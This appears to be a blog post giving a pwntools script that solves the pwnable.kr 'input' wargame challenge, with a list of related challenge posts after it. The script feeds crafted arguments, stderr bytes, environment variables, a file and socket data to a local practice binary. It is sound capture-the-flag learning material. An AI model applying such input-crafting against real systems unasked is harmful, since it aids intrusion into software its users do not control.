exploit code
# -*- coding: utf-8 -*-
from pwn import *
global port
port = "8080"
def stage1():
arg = ['/home/input2/input']
for i in range(99):
arg.append(str(i))
arg[65] = "\x00"
arg[66] = "\x20\x0a\x0d"
arg[67] = port #stage5
return arg
def stage2():
f = open("stderr", "w")
f.write("\x00\x0a\x02\xff")
f.close()
err = open("stderr", "r")
return err
def stage3():
env = {'\xde\xad\xbe\xef': '\xca\xfe\xba\xbe'}
return env
def stage4():
fp = open("\x0a", "w")
fp.write("\x00\x00\x00\x00")
fp.close()
def stage5():
r = remote("localhost", int(port))
r.sendline("\xde\xad\xbe\xef")
r.close()
def main():
p = process(stage1(), env=stage3(), stderr=stage2())
print p.recv(1024)
p.sendline("\x00\x0a\x00\xff") # stage2
print p.recvline('')
stage4()
print p.recv(1024)
stage5()
p.interactive()
p.close()
if __name__ == "__main__":
main()
'Wargame > pwnable.kr' 카테고리의 다른 글
| pwnable.kr cmd2 (0) | 2018.06.15 |
|---|---|
| pwnable.kr cmd1 (0) | 2018.06.15 |
| pwnable.kr coin1 (0) | 2018.02.19 |
| [pwnable.kr] shellshock 1p (0) | 2016.08.20 |
| [pwnable.kr] mistake 1p (0) | 2016.08.19 |